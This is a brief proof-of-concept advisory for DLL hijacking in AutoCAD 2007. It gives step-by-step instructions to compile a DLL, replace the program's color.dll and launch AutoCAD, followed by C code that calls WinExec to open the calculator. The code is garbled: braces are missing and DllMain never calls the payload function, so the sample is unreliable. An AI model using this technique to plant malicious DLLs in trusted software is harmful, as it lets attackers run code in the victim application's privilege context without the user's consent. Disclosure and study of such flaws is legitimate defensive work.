Autodesk AutoCAD 2007

所属类别 color.dll

A vulnerability exists in windows that allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privelage context of the targeted application.
1. Compile dll
2. Replace color.dll in autocad directory with your newly compiled dll
3. Launch Autocad 2007
int pwnme()
  WinExec("calc", SW_NORMAL);
  return 0;
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
  return 0;